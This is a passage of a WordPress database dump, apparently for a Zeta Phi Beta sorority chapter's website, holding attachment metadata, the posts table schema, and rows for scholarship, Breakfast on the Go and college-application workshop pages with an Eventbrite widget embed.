";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(5451,1395,'_wp_attachment_backup_sizes','a:1:{s:9:\"full-orig\";a:3:{s:5:\"width\";i:155;s:6:\"height\";i:200;s:4:\"file\";s:37:\"LGZ_YouthOpenHouse2020-finalsmall.png\";}}'),(5452,1390,'_thumbnail_id','1395'),(5481,1431,'_edit_lock','1611705766:1'),(5525,1453,'_wp_attached_file','2021/09/lilletsig-e1632320769724.png'),(5526,1453,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:582;s:6:\"height\";i:132;s:4:\"file\";s:36:\"2021/09/lilletsig-e1632320769724.png\";s:5:\"sizes\";a:5:{s:6:\"medium\";a:4:{s:4:\"file\";s:35:\"lilletsig-e1632320769724-300x68.png\";s:5:\"width\";i:300;s:6:\"height\";i:68;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:36:\"lilletsig-e1632320769724-150x132.png\";s:5:\"width\";i:150;s:6:\"height\";i:132;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:36:\"lilletsig-e1632320769724-400x132.png\";s:5:\"width\";i:400;s:6:\"height\";i:132;s:9:\"mime-type\";s:9:\"image/png\";}s:4:\"grid\";a:4:{s:4:\"file\";s:36:\"lilletsig-e1632320769724-450x132.png\";s:5:\"width\";i:450;s:6:\"height\";i:132;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"thumb\";a:4:{s:4:\"file\";s:36:\"lilletsig-e1632320769724-180x110.png\";s:5:\"width\";i:180;s:6:\"height\";i:110;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(5524,6,'_yoast_wpseo_estimated-reading-time-minutes',''),(5527,1453,'_wp_attachment_backup_sizes','a:6:{s:9:\"full-orig\";a:3:{s:5:\"width\";i:623;s:6:\"height\";i:207;s:4:\"file\";s:13:\"lilletsig.png\";}s:14:\"thumbnail-orig\";a:4:{s:4:\"file\";s:21:\"lilletsig-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:11:\"medium-orig\";a:4:{s:4:\"file\";s:21:\"lilletsig-300x100.png\";s:5:\"width\";i:300;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:19:\"post-thumbnail-orig\";a:4:{s:4:\"file\";s:21:\"lilletsig-400x207.png\";s:5:\"width\";i:400;s:6:\"height\";i:207;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"grid-orig\";a:4:{s:4:\"file\";s:21:\"lilletsig-450x207.png\";s:5:\"width\";i:450;s:6:\"height\";i:207;s:9:\"mime-type\";s:9:\"image/png\";}s:10:\"thumb-orig\";a:4:{s:4:\"file\";s:21:\"lilletsig-180x110.png\";s:5:\"width\";i:180;s:6:\"height\";i:110;s:9:\"mime-type\";s:9:\"image/png\";}}'),(5528,1455,'_wp_attached_file','2021/09/2021-scholarship-recipient-1.png'),(5529,1455,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1920;s:6:\"height\";i:1080;s:4:\"file\";s:40:\"2021/09/2021-scholarship-recipient-1.png\";s:5:\"sizes\";a:9:{s:6:\"medium\";a:4:{s:4:\"file\";s:40:\"2021-scholarship-recipient-1-300x169.png\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:41:\"2021-scholarship-recipient-1-1024x576.png\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:40:\"2021-scholarship-recipient-1-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:40:\"2021-scholarship-recipient-1-768x432.png\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:41:\"2021-scholarship-recipient-1-1536x864.png\";s:5:\"width\";i:1536;s:6:\"height\";i:864;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:40:\"2021-scholarship-recipient-1-400x400.png\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}s:4:\"grid\";a:4:{s:4:\"file\";s:40:\"2021-scholarship-recipient-1-450x300.png\";s:5:\"width\";i:450;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:4:\"list\";a:4:{s:4:\"file\";s:40:\"2021-scholarship-recipient-1-680x300.png\";s:5:\"width\";i:680;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"thumb\";a:4:{s:4:\"file\";s:40:\"2021-scholarship-recipient-1-180x110.png\";s:5:\"width\";i:180;s:6:\"height\";i:110;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(5530,1456,'_wp_attached_file','2021/09/2021-scholarship-recipient-2.png'),(5531,1456,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1920;s:6:\"height\";i:1080;s:4:\"file\";s:40:\"2021/09/2021-scholarship-recipient-2.png\";s:5:\"sizes\";a:9:{s:6:\"medium\";a:4:{s:4:\"file\";s:40:\"2021-scholarship-recipient-2-300x169.png\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:41:\"2021-scholarship-recipient-2-1024x576.png\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:40:\"2021-scholarship-recipient-2-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:40:\"2021-scholarship-recipient-2-768x432.png\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:41:\"2021-scholarship-recipient-2-1536x864.png\";s:5:\"width\";i:1536;s:6:\"height\";i:864;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:40:\"2021-scholarship-recipient-2-400x400.png\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";}s:4:\"grid\";a:4:{s:4:\"file\";s:40:\"2021-scholarship-recipient-2-450x300.png\";s:5:\"width\";i:450;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:4:\"list\";a:4:{s:4:\"file\";s:40:\"2021-scholarship-recipient-2-680x300.png\";s:5:\"width\";i:680;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"thumb\";a:4:{s:4:\"file\";s:40:\"2021-scholarship-recipient-2-180x110.png\";s:5:\"width\";i:180;s:6:\"height\";i:110;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(5532,1455,'_edit_lock','1632334908:1'),(5533,1456,'_edit_lock','1632335589:1'),(5534,797,'_yoast_wpseo_estimated-reading-time-minutes','');
/*!40000 ALTER TABLE `lwz_postmeta` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `lwz_posts`
--

DROP TABLE IF EXISTS `lwz_posts`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `lwz_posts` (
  `ID` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `post_author` bigint(20) unsigned NOT NULL DEFAULT '0',
  `post_date` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `post_date_gmt` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `post_content` longtext COLLATE utf8mb4_unicode_520_ci NOT NULL,
  `post_title` text COLLATE utf8mb4_unicode_520_ci NOT NULL,
  `post_excerpt` text COLLATE utf8mb4_unicode_520_ci NOT NULL,
  `post_status` varchar(20) COLLATE utf8mb4_unicode_520_ci NOT NULL DEFAULT 'publish',
  `comment_status` varchar(20) COLLATE utf8mb4_unicode_520_ci NOT NULL DEFAULT 'open',
  `ping_status` varchar(20) COLLATE utf8mb4_unicode_520_ci NOT NULL DEFAULT 'open',
  `post_password` varchar(255) COLLATE utf8mb4_unicode_520_ci NOT NULL DEFAULT '',
  `post_name` varchar(200) COLLATE utf8mb4_unicode_520_ci NOT NULL DEFAULT '',
  `to_ping` text COLLATE utf8mb4_unicode_520_ci NOT NULL,
  `pinged` text COLLATE utf8mb4_unicode_520_ci NOT NULL,
  `post_modified` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `post_modified_gmt` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `post_content_filtered` longtext COLLATE utf8mb4_unicode_520_ci NOT NULL,
  `post_parent` bigint(20) unsigned NOT NULL DEFAULT '0',
  `guid` varchar(255) COLLATE utf8mb4_unicode_520_ci NOT NULL DEFAULT '',
  `menu_order` int(11) NOT NULL DEFAULT '0',
  `post_type` varchar(20) COLLATE utf8mb4_unicode_520_ci NOT NULL DEFAULT 'post',
  `post_mime_type` varchar(100) COLLATE utf8mb4_unicode_520_ci NOT NULL DEFAULT '',
  `comment_count` bigint(20) NOT NULL DEFAULT '0',
  PRIMARY KEY (`ID`),
  KEY `post_name` (`post_name`(191)),
  KEY `type_status_date` (`post_type`,`post_status`,`post_date`,`ID`),
  KEY `post_parent` (`post_parent`),
  KEY `post_author` (`post_author`)
) ENGINE=MyISAM AUTO_INCREMENT=1457 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `lwz_posts`
--

LOCK TABLES `lwz_posts` WRITE;
/*!40000 ALTER TABLE `lwz_posts` DISABLE KEYS */;
INSERT INTO `lwz_posts` VALUES (884,2,'2017-01-11 22:43:16','2017-01-12 03:43:16','','IMG_0849','','inherit','open','closed','','img_0849','','','2017-01-11 22:43:16','2017-01-12 03:43:16','',0,'https://zphiblgz.org/wp-content/uploads/2017/01/IMG_0849.jpg',0,'attachment','image/jpeg',0),(1297,1,'2018-09-14 21:47:09','2018-09-15 02:47:09','Lambda Gamma Zeta Chapter of Howard County will be providing students taking the SAT exam at Wilde Lake High School with a quick and healthy breakfast. Research shows that students who have a healthy breakfast or snack before testing have better focus and perform better overall.\r\n\r\nBreakfast on the Go is an initiative under ZHope. For more information visit <a href=\"https://zphiblgz.org/zhope/breakfastonthego/\">https://zphiblgz.org/zhope/breakfastonthego/</a>\r\n\r\n&nbsp;','Breakfast on the Go','','inherit','closed','closed','','493-revision-v1','','','2018-09-14 21:47:09','2018-09-15 02:47:09','',493,'https://zphiblgz.org/493-revision-v1/',0,'revision','',0),(899,2,'2017-01-12 19:43:36','2017-01-13 00:43:36','','TamikaDaniel','','inherit','open','closed','','tamikadaniel-2','','','2017-01-12 19:43:36','2017-01-13 00:43:36','',0,'https://zphiblgz.org/wp-content/uploads/2017/01/TamikaDaniel.jpg',0,'attachment','image/jpeg',0),(59,1,'2014-12-17 14:51:28','2014-12-17 14:51:28','','W. Ruth Conway Scholarship Fund','','publish','closed','open','','scholarship','','','2017-01-15 15:36:12','2017-01-15 20:36:12','',0,'http://demo.touchsize.com/hopeful/?post_type=cause&#038;p=59',0,'cause','',0),(750,1,'2016-12-30 07:20:24','2016-12-30 07:20:24','','W. Ruth Conway Scholarship Fund','','inherit','closed','closed','','59-revision-v1','','','2016-12-30 07:20:24','2016-12-30 07:20:24','',59,'https://zphiblgz.org/2016/12/30/59-revision-v1/',0,'revision','',0),(879,2,'2017-01-11 22:34:22','2017-01-12 03:34:22','','IMG_0842','','inherit','open','closed','','img_0842','','','2017-01-11 22:34:22','2017-01-12 03:34:22','',0,'https://zphiblgz.org/wp-content/uploads/2017/01/IMG_0842.jpg',0,'attachment','image/jpeg',0),(1294,1,'2018-09-14 21:02:52','2018-09-15 02:02:52','','NewSizeAward','','inherit','closed','closed','','newsizeaward','','','2018-09-14 21:02:52','2018-09-15 02:02:52','',0,'https://zphiblgz.org/wp-content/uploads/2018/09/NewSizeAward.png',0,'attachment','image/png',0),(871,2,'2017-01-11 22:14:27','2017-01-12 03:14:27','','IMG_0839','','inherit','open','closed','','img_0839','','','2017-01-11 22:14:27','2017-01-12 03:14:27','',0,'https://zphiblgz.org/wp-content/uploads/2017/01/IMG_0839.jpg',0,'attachment','image/jpeg',0),(864,2,'2017-01-11 21:47:24','2017-01-12 02:47:24','','JontueSumler','','inherit','open','closed','','jontuesumler','','','2017-01-11 21:47:24','2017-01-12 02:47:24','',0,'https://zphiblgz.org/wp-content/uploads/2017/01/JontueSumler.jpg',0,'attachment','image/jpeg',0),(1304,1,'2018-09-14 22:22:45','2018-09-15 03:22:45','','Nuts and Bolts Workshop Series: Getting Accepted (Successful Tips to Complete the College Application)','','inherit','closed','closed','','1298-revision-v1','','','2018-09-14 22:22:45','2018-09-15 03:22:45','',1298,'https://zphiblgz.org/1298-revision-v1/',0,'revision','',0),(1301,1,'2018-09-14 22:10:14','2018-09-15 03:10:14','Are you a student that\'s preparing to start applying for college? Are you a parent who has a student that will soon begin the college application process?\r\n\r\nAccording to the Inside Higher Education, 80% of colleges require prospective applicants to complete an essay with their college application. In addition, most scholarships also require applicants to complete essays. This workshop will help students and parents become knowledgeable on how to write a successful college or scholarship essay.\r\n\r\nIn addition, participants will receive a free template on how to organize their college applications.\r\n\r\n&nbsp;\r\n<div id=\"eventbrite-widget-container-48870235189\"></div>\r\n\r\n<script src=\"https://www.eventbrite.com/static/widgets/eb_widgets.js\"></script>\r\n\r\n<script type=\"text/javascript\">\r\n    var exampleCallback = function() {\r\n        console.log(\'Order complete!\');\r\n    };\r\n\r\n    window.EBWidgets.createWidget({\r\n        // Required\r\n        widgetType: \'checkout\',\r\n        eventId: \'48870235189\',\r\n        iframeContainerId: \'eventbrite-widget-container-48870235189\',\r\n\r\n        // Optional\r\n        iframeContainerHeight: 425,  // Widget height in pixels. Defaults to a minimum of 425px if not provided\r\n        onOrderComplete: exampleCallback  // Method called when an order has successfully completed\r\n    });\r\n</script>','Nuts and Bolts Workshop Series: Getting Accepted (Successful Tips to Complete the College Application)','','inherit','closed','closed','','1298-revision-v1','','','2018-09-14 22:10:14','2018-09-15 03:10:14','',1298,'https://zphiblgz.org/1298-revision-v1/',0,'revision','',0),(869,2,'2017-01-11 22:10:56','2017-01-12 03:10:56','','IMG_0852','','inherit','open','closed','','img_0852','','','2017-01-11 22:10:56','2017-01-12 03:10:56','',0,'https://zphiblgz.org/wp-content/uploads/2017/01/IMG_0852.jpg',0,'attachment','image/jpeg',0),(873,2,'2017-01-11 22:19:06','2017-01-12 03:19:06','','SorLawson_HS','','inherit','open','closed','','sorlawson_hs','','','2017-01-11 22:19:06','2017-01-12 03:19:06','',0,'https://zphiblgz.org/wp-content/uploads/2017/01/SorLawson_HS.jpg',0,'attachment','image/jpeg',0),(737,1,'2016-12-30 05:08:01','2016-12-30 05:08:01','','hcpsslogo-1','','inherit','open','closed','','hcpsslogo-1','','','2016-12-30 05:08:01','2016-12-30 05:08:01','',247,'https://zphiblgz.org/wp-content/uploads/2014/12/hcpsslogo-1.png',0,'attachment','image/png',0),(738,1,'2016-12-30 05:24:28','2016-12-30 10:24:28','','Youth Auxiliaries','','publish','closed','closed','','youth','','','2020-07-09 14:56:38','2020-07-09 19:56:38','',0,'https://zphiblgz.org/?page_id=738',6,'page','',0),(739,1,'2016-12-30 05:24:28','2016-12-30 05:24:28','','Youth Auxiliary','','inherit','closed','closed','','738-revision-v1','','','2016-12-30 05:24:28','2016-12-30 05:24:28','',738,'https://zphiblgz.org/2016/12/30/738-revision-v1/',0,'revision','',0),(741,1,'2016-12-30 05:44:46','2016-12-30 05:44:46','','connie','','inherit','open','closed','','connie','','','2016-12-30 05:44:46','2016-12-30 05:44:46','',0,'https://zphiblgz.org/wp-content/uploads/2016/12/Connie.png',0,'attachment','image/png',0),(742,1,'2016-12-30 05:44:51','2016-12-30 05:44:51','','diandra','','inherit','open','closed','','diandra','','','2016-12-30 05:44:51','2016-12-30 05:44:51','',0,'https://zphiblgz.org/wp-content/uploads/2016/12/Diandra.png',0,'attachment','image/png',0),(801,1,'2017-01-03 14:55:32','2017-01-03 19:55:32','','rsz_zeta-phi-beta-seal-1','','inherit','open','closed','','rsz_zeta-phi-beta-seal-1','','','2017-01-03 14:55:32','2017-01-03 19:55:32','',190,'https://zphiblgz.org/wp-content/uploads/2014/12/rsz_zeta-phi-beta-seal-1.png',0,'attachment','image/png',0),(749,1,'2016-12-30 07:15:43','2016-12-30 07:15:43','','img_0829','','inherit','open','closed','','img_0829','','','2016-12-30 07:15:43','2016-12-30 07:15:43','',0,'https://zphiblgz.org/wp-content/uploads/2016/12/IMG_0829.jpg',0,'attachment','image/jpeg',0),(90,1,'2014-12-18 14:34:28','2014-12-18 14:34:28','','March of Dimes','','publish','open','open','','marchofdimes-2','','','2017-04-18 17:28:41','2017-04-18 22:28:41','',0,'http://demo.touchsize.com/hopeful/?post_type=cause&#038;p=90',0,'cause','',0),(954,1,'2017-01-16 04:48:05','2017-01-16 09:48:05','','W. Ruth Conway Scholarship','','inherit','closed','closed','','90-revision-v1','','','2017-01-16 04:48:05','2017-01-16 09:48:05','',90,'https://zphiblgz.org/90-revision-v1/',0,'revision','',0),(570,1,'2016-12-03 01:31:46','2016-12-03 01:31:46','','trial','','inherit','open','closed','','trial','','','2016-12-03 01:31:46','2016-12-03 01:31:46','',6,'https://zphiblgz.org/wp-content/uploads/2014/12/Trial.png',0,'attachment','image/png',0),(568,1,'2016-12-03 00:58:56','2016-12-03 00:58:56','','amicettebanner','','inherit','open','closed','','amicettebanner','','','2016-12-03 00:58:56','2016-12-03 00:58:56','',0,'https://zphiblgz.org/wp-content/uploads/2016/12/AmicetteBanner.png',0,'attachment','image/png',0),(563,1,'2016-12-02 18:06:38','2016-12-02 18:06:38','','Member Only Admin','','publish','closed','closed','','member-only-admin','','','2016-12-04 19:27:27','2016-12-04 19:27:27','',0,'https://zphiblgz.org/?post_type=um_role&#038;p=563',0,'um_role','',0),(562,1,'2016-12-02 17:55:37','2016-12-02 17:55:37','','Member','','publish','closed','closed','','member','','','2016-12-02 17:55:37','2016-12-02 17:55:37','',0,'https://zphiblgz.org/um_role/member/',0,'um_role','',0),(561,1,'2016-12-02 17:55:36','2016-12-02 17:55:36','','Admin','','publish','closed','closed','','admin','','','2016-12-02 18:04:39','2016-12-02 18:04:39','',0,'https://zphiblgz.org/um_role/admin/',0,'um_role','',0),(6,1,'2014-12-16 11:56:09','2014-12-16 11:56:09','','Home','','publish','closed','closed','','homepage','','','2021-09-22 09:30:22','2021-09-22 14:30:22','',0,'http://demo.touchsize.com/hopeful/?page_id=6',1,'page','',0),(190,1,'2014-12-21 18:32:30','2014-12-21 23:32:30','','History','','publish','closed','closed','','history','','','2017-09-09 14:42:20','2017-09-09 19:42:20','',0,'http://demo.touchsize.com/hopeful/?page_id=190',2,'page','',0),(247,1,'2014-12-22 09:41:18','2014-12-22 14:41:18','','Z-HOPE','','publish','closed','closed','','zhope','','','2018-09-15 02:47:12','2018-09-15 07:47:12','',0,'http://demo.touchsize.com/hopeful/?page_id=247',4,'page','',0),(769,1,'2017-01-03 11:02:42','2017-01-03 16:02:42','','lgzpressrelease-thumbnail','','inherit','open','closed','','lgzpressrelease-thumbnail','','','2017-01-03 11:02:42','2017-01-03 16:02:42','',768,'https://zphiblgz.org/homepage/lgzpressrelease-3/lgzpressrelease-thumbnail/',0,'attachment','image/jpeg',0),(812,1,'2017-01-10 19:21:51','2017-01-11 00:21:51','','dscf49776_pps-by-madisons','','inherit','open','closed','','dscf49776_pps-by-madisons','','','2017-01-10 19:21:51','2017-01-11 00:21:51','',0,'https://zphiblgz.org/wp-content/uploads/2016/12/DSCF49776_pps-by-Madisons.jpg',0,'attachment','image/jpeg',0),(771,1,'2017-01-03 11:49:45','2017-01-03 16:49:45','','amicette','','inherit','open','closed','','amicette','','','2017-01-03 11:49:45','2017-01-03 16:49:45','',738,'https://zphiblgz.org/wp-content/uploads/2016/12/amicette.png',0,'attachment','image/png',0),(772,1,'2017-01-03 12:24:58','2017-01-03 17:24:58','','Breakfast on the Go','','publish','closed','closed','','breakfastonthego','','','2017-09-09 13:42:27','2017-09-09 18:42:27','',247,'https://zphiblgz.org/?page_id=772',7,'page','',0),(773,1,'2017-01-03 12:24:58','2017-01-03 17:24:58','','Breakfast on the Go','','inherit','closed','closed','','772-revision-v1','','','2017-01-03 12:24:58','2017-01-03 17:24:58','',772,'https://zphiblgz.org/2017/01/03/772-revision-v1/',0,'revision','',0),(780,1,'2017-01-03 13:19:17','2017-01-03 18:19:17','','rsz_wineshop_at_home_logo_pms_highres-1','','inherit','open','closed','','rsz_wineshop_at_home_logo_pms_highres-1','','','2017-01-03 13:19:17','2017-01-03 18:19:17','',772,'https://zphiblgz.org/wp-content/uploads/2017/01/rsz_wineshop_at_home_logo_pms_highres-1.jpg',0,'attachment','image/jpeg',0),(781,1,'2017-01-03 13:48:40','2017-01-03 18:48:40','','A Pretty & Polished Affair','','publish','closed','closed','','appa','','','2018-09-15 03:05:25','2018-09-15 08:05:25','',247,'https://zphiblgz.org/?page_id=781',5,'page','',0),(782,1,'2017-01-03 13:44:55','2017-01-03 18:44:55','','becca','','inherit','open','closed','','becca','','','2017-01-03 13:44:55','2017-01-03 18:44:55','',781,'https://zphiblgz.org/wp-content/uploads/2017/01/becca.png',0,'attachment','image/png',0),(783,1,'2017-01-03 13:47:05','2017-01-03 18:47:05','','table','','inherit','open','closed','','table','','','2017-01-03 13:47:05','2017-01-03 18:47:05','',781,'https://zphiblgz.org/wp-content/uploads/2017/01/Table.jpg',0,'attachment','image/jpeg',0),(784,1,'2017-01-03 13:48:40','2017-01-03 18:48:40','','A Pretty & Polished Affair','','inherit','closed','closed','','781-revision-v1','','','2017-01-03 13:48:40','2017-01-03 18:48:40','',781,'https://zphiblgz.org/2017/01/03/781-revision-v1/',0,'revision','',0),(785,1,'2017-01-03 14:04:19','2017-01-03 19:04:19','','table1','','inherit','open','closed','','table1','','','2017-01-03 14:04:19','2017-01-03 19:04:19','',781,'https://zphiblgz.org/wp-content/uploads/2017/01/Table1.png',0,'attachment','image/png',0),(786,1,'2017-01-03 14:13:37','2017-01-03 19:13:37','[gravityform id=\"4\" title=\"true\" description=\"false\"][gravityform id=\"4\" title=\"true\" description=\"true\"]','Zetas and Elders Engaging','','publish','closed','closed','','zen','','','2017-09-14 11:35:26','2017-09-14 16:35:26','',247,'https://zphiblgz.org/?page_id=786',9,'page','',0),(787,1,'2017-01-03 14:13:37','2017-01-03 19:13:37','','Zetas and Elders Engaging','','inherit','closed','closed','','786-revision-v1','','','2017-01-03 14:13:37','2017-01-03 19:13:37','',786,'https://zphiblgz.org/2017/01/03/786-revision-v1/',0,'revision','',0),(1302,1,'2018-09-14 22:33:55','2018-09-15 03:33:55','Are you a student that\'s preparing to start applying for college? Are you a parent who has a student that will soon begin the college application process? \n\nAccording to the Inside Higher Education, 80% of colleges require prospective applicants to complete an essay with their college application. In addition, most scholarships also require applicants to complete essays. This workshop will help students and parents become knowledgeable on how to write a successful college or scholarship essay.\n\nIn addition, participants will receive a free template on how to organize their college applications.\n\n<div id=\"eventbrite-widget-container-48870235189\"></div>\n\n<script src=\"https://www.eventbrite.com/static/widgets/eb_widgets.js\"></script>\n\n<script type=\"text/javascript\">\n    var exampleCallback = function() {\n        console.log(\'Order complete!\');\n    };\n\n    window.EBWidgets.createWidget({\n        // Required\n        widgetType: \'checkout\',\n        eventId: \'48870235189\',\n        iframeContainerId: \'eventbrite-widget-container-48870235189\',\n\n        // Optional\n        iframeContainerHeight: 425,  // Widget height in pixels. Defaults to a minimum of 425px if not provided\n        onOrderComplete: exampleCallback  // Method called when an order has successfully completed\n    });\n</script>\n[/raw]','Nuts and Bolts Workshop Series: Getting Accepted (Successful Tips to Complete the College Application)','','inherit','closed','closed','','1298-autosave-v1','','','2018-09-14 22:33:55','2018-09-15 03:33:55','',1298,'https://zphiblgz.org/1298-autosave-v1/',0,'revision','',0),(797,1,'2017-01-03 14:29:09','2017-01-03 19:29:09','[button icon=\"icon-noicon\" text=\"\" url=\"\" target=\"_blank\" size=\"medium\" text_color=\"#FFFFFF\" mode_display=\"background-button\" border_color=\"#FFFFFF\" ][/button]','W. Ruth Conway Scholarship','','publish','closed','closed','','scholarship','','','2021-09-22 13:32:03','2021-09-22 18:32:03','',0,'https://zphiblgz.org/?page_id=797',8,'page','',0),(798,1,'2017-01-03 14:29:09','2017-01-03 19:29:09','','W. Ruth Conway Scholarship','','inherit','closed','closed','','797-revision-v1','','','2017-01-03 14:29:09','2017-01-03 19:29:09','',797,'https://zphiblgz.org/2017/01/03/797-revision-v1/',0,'revision','',0),(806,1,'2017-01-03 20:34:30','2017-01-04 01:34:30','','Students at graduation ceremony','Students at graduation ceremony','inherit','open','closed','','students-at-graduation-ceremony','','','2017-01-03 20:34:30','2017-01-04 01:34:30','',797,'https://zphiblgz.org/wp-content/uploads/2017/01/students-at-graduation-ceremony_rYeLM4Rrs.jpg',0,'attachment','image/jpeg',0),(807,1,'2017-01-03 20:37:18','2017-01-04 01:37:18','','degree','Student graduation ceremony','inherit','open','closed','','degree','','','2017-01-03 20:37:18','2017-01-04 01:37:18','',797,'https://zphiblgz.org/wp-content/uploads/2017/01/degree.jpg',0,'attachment','image/jpeg',0),(1180,1,'2017-09-29 20:14:56','2017-09-30 01:14:56','','Cherice','','inherit','closed','closed','','cherice','','','2017-09-29 20:14:56','2017-09-30 01:14:56','',6,'https://zphiblgz.org/wp-content/uploads/2014/12/Cherice.png',0,'attachment','image/png',0),(1179,1,'2017-09-29 20:00:47','2017-09-30 01:00:47','','Soror Conway1','','inherit','closed','closed','','soror-conway1','','','2017-09-29 20:00:47','2017-09-30 01:00:47','',797,'https://zphiblgz.org/wp-content/uploads/2017/01/Soror-Conway1.png',0,'attachment','image/png',0),(1182,1,'2017-09-29 20:19:38','2017-09-30 01:19:38','','c1','','inherit','closed','closed','','c1','','','2017-09-29 20:19:38','2017-09-30 01:19:38','',6,'https://zphiblgz.org/wp-content/uploads/2014/12/c1.png',0,'attachment','image/png',0),(1181,1,'2017-09-29 20:17:48','2017-09-30 01:17:48','','Cherice','','inherit','closed','closed','','cherice-2','','','2017-09-29 20:17:48','2017-09-30 01:17:48','',6,'https://zphiblgz.org/wp-content/uploads/2014/12/Cherice.jpg',0,'attachment','image/jpeg',0),(546,1,'2016-12-02 17:55:33','2016-12-02 17:55:33','','Members','','publish','closed','closed','','members','','','2016-12-02 17:55:33','2016-12-02 17:55:33','',0,'https://zphiblgz.org/um_directory/members/',0,'um_directory','',0),(545,1,'2016-12-02 17:55:33','2016-12-02 17:55:33','','Default Profile','','publish','closed','closed','','default-profile','','','2016-12-02 17:55:33','2016-12-02 17:55:33','',0,'https://zphiblgz.org/um_form/default-profile/',0,'um_form','',0),(544,1,'2016-12-02 17:55:32','2016-12-02 17:55:32','','Default Login','','publish','closed','closed','','default-login','','','2016-12-02 17:55:32','2016-12-02 17:55:32','',0,'https://zphiblgz.org/um_form/default-login/',0,'um_form','',0),(543,1,'2016-12-02 17:55:32','2016-12-02 17:55:32','','Default Registration','','publish','closed','closed','','default-registration','','','2016-12-02 18:12:10','2016-12-02 18:12:10','',0,'https://zphiblgz.org/um_form/default-registration/',0,'um_form','',0),(531,1,'2016-12-02 16:14:19','2016-12-02 16:14:19','','Denim & Pearls 